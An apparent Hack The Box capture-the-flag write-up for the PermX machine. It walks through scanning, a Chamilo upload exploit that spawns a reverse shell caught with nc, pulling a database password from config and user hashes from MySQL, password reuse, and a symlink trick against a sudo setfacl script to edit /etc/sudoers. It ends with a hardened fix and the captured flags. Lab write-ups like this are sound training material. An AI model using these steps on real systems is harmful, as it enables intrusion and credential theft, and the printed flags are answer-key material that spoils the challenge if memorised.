HTB • CTF • PermX • Write-Up

Published: at 06:35 PM


INFO

CTF URL: https://app.hackthebox.com/machines/PermX

IP: 10.10.11.23

Difficulty: Easy

Reconnaissance

NMAP

nmap -p- 10.10.11.23 -v --min-rate 10000
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

nmap -p22,80 -sS -sC -sV 10.10.11.23 -v --min-rate 10000
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

WEB

First, add permx.htb to /etc/hosts.

Things I found:

Dir

dirsearch -u http://permx.htb/
# result
[12:17:38] 301 -  303B  - /js  ->  http://permx.htb/js/                     
[12:18:08] 200 -    3KB - /404.html                                         
[12:18:15] 200 -    4KB - /about.html                                       
[12:19:22] 200 -    3KB - /contact.html                                     
[12:19:26] 301 -  304B  - /css  ->  http://permx.htb/css/                   
[12:19:52] 301 -  304B  - /img  ->  http://permx.htb/img/                   
[12:19:59] 200 -  448B  - /js/                                              
[12:20:03] 200 -  491B  - /lib/                                             
[12:20:04] 301 -  304B  - /lib  ->  http://permx.htb/lib/                   
[12:20:05] 200 -  649B  - /LICENSE.txt                                      

Subdomain

wfuzz -c -f sub-fighter -w subdomains.lst  -u 'http://permx.htb' -H "Host: FUZZ.permx.htb" --hw 65
# result
000003641:   200        352 L    940 W      19347 Ch    "lms"

Add lms.permx.htb to /etc/hosts.

LMS

Found Info

Dir

dirsearch -u http://lms.permx.htb/
# result                              
...
[13:00:15] 200 -    1KB - /documentation/                                   
[13:00:15] 301 -  322B  - /documentation  ->  http://lms.permx.htb/documentation/
...

Exploiting Chamilo

python3 main.py -u http://lms.permx.htb/ -a scan
# result
[+] Target is likely vulnerable. Go ahead. [+]

Upload a reverse shell:

python3 main.py -u http://lms.permx.htb/ -a revshell
# fill ip and port

Result:

nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.178] from (UNKNOWN) [10.10.11.23] 33724
bash: cannot set terminal process group (1170): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ 

First, stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg

PrivEsc to User

Enum - Mysql

Open ports:

ss -tulpn
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp   UNCONN 0      0      127.0.0.53%lo:53        0.0.0.0:*          
udp   UNCONN 0      0            0.0.0.0:68        0.0.0.0:*          
tcp   LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
tcp   LISTEN 0      4096   127.0.0.53%lo:53        0.0.0.0:*          
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*          
tcp   LISTEN 0      511                *:80              *:*          
tcp   LISTEN 0      128             [::]:22           [::]:*  

MySQL on 127.0.0.1:3306 is interesting.

In /var/www, using grep -ir db_password, I found the Chamilo database credentials:

...
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
...

Let's connect:

mysql -h localhost -u chamilo -p 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 93
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

Let's enumerate:

show databases;
+--------------------+
| Database           |
+--------------------+
| chamilo            |
| information_schema |
+--------------------+

use chamilo;
show tables;
+-------------------------------------+
| Tables_in_chamilo                   |
+-------------------------------------+
...
| user                                |
...


select username, lastname, firstname, official_code, password, salt from user;
+----------+-----------+-----------+---------------+--------------------------------------------------------------+---------------------------------------------+
| username | lastname  | firstname | official_code | password                                                     | salt                                        |
+----------+-----------+-----------+---------------+--------------------------------------------------------------+---------------------------------------------+
| admin    | Miller    | Davis     | ADMIN         | $2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra | awb0kMoTumbFvi22ojwv.Pg92gFTMOt837kWsGVbJN4 |
| anon     | Anonymous | Joe       | anonymous     | $2y$04$wyjp2UVTeiD/jF4OdoYDquf4e7OWi6a3sohKRDe80IHAyihX0ujdS | Mr1pyTT.C/oEIPb/7ezOdrCDKM.KHb0nrXAUyIyt/MY |
+----------+-----------+-----------+---------------+--------------------------------------------------------------+---------------------------------------------+

Cracking the hash:

vim hashes # create a file and paste hashes
john hashes --wordlist=/usr/share/wordlists/rockyou.txt

That does not work; there is an easier way :).

Reuse the database password for the mtz user:

su mtz
# 03F6lY3uXAP2bkW8

whoami
mtz

It is better to log in over SSH.

user.txt

cat user.txt 
ceaefab1bca6a325155ec4a000dcad60

PrivEsc to Root

/opt/acl.sh

We can run /opt/acl.sh as root:

sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
sudo /opt/acl.sh
Usage: /opt/acl.sh user perm file

/opt/acl.sh wraps the setfacl binary:

cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

The check only inspects the literal path string, so a symlink under /home/mtz that points at / passes it while setfacl follows the link. Let's link the root directory into our home directory:

ln -s / r
sudo /opt/acl.sh mtz rwx /home/mtz/r/etc/sudoers
# mtz now has rwx on /etc/sudoers, so edit it
vim /etc/sudoers
# mtz ALL=(ALL:ALL) ALL
sudo su
whoami
# root
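A hardened version of the path check, as an added example (not the script from the box): it canonicalises the target with GNU realpath before comparing it against the allowed directory, so the symlink trick above is rejected and setfacl only ever runs on the path that was actually checked. The base directory /home/mtz and the rwx-only permission filter are assumptions.

```shell
#!/bin/bash
# Hardened variant of the target check in /opt/acl.sh (added example, not
# the box's own script). The original tests the *literal* argument against
# /home/mtz/*, so /home/mtz/r/etc/sudoers passes when r is a symlink to /,
# and setfacl then changes the ACL of the real /etc/sudoers.
# Canonicalising the path first (GNU realpath -e) closes that bypass.

ALLOWED_ROOT="${ALLOWED_ROOT:-/home/mtz}"   # assumed base directory

# check_target PATH
# Prints the canonical path and returns 0 only if PATH resolves to a regular
# file that lives inside $ALLOWED_ROOT; returns 1 for anything else
# (missing file, symlink escape, '..' traversal, directory).
check_target() {
    local target="$1" resolved
    # -e: every component must exist; all symlinks are fully resolved
    resolved=$(realpath -e -- "$target" 2>/dev/null) || return 1
    case "$resolved" in
        "$ALLOWED_ROOT"/*) ;;           # canonical path stays inside the tree
        *) return 1 ;;
    esac
    [ -f "$resolved" ] || return 1      # regular file only, no directories
    printf '%s\n' "$resolved"
}

# apply_acl USER PERM PATH: same interface as /opt/acl.sh, but it operates on
# the resolved path that was checked, and only accepts r/w/x/- permissions.
apply_acl() {
    local user="$1" perm="$2" resolved
    case "$perm" in
        *[!rwx-]*|"") echo "Bad perm." >&2; return 1 ;;
    esac
    resolved=$(check_target "$3") || { echo "Access denied." >&2; return 1; }
    /usr/bin/setfacl -m "u:$user:$perm" "$resolved"
}

# Only act when invoked with the three positional arguments.
if [ "$#" -eq 3 ]; then
    apply_acl "$@"
fi
```

A race still remains between the check and setfacl if the user can replace a directory component under /home/mtz afterwards; a fuller fix would also verify the file's owner, or avoid operating on user-controlled paths as root at all.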

root.txt

cat root.txt 
63b1c7e794167e335d4d638f50198ce3

Result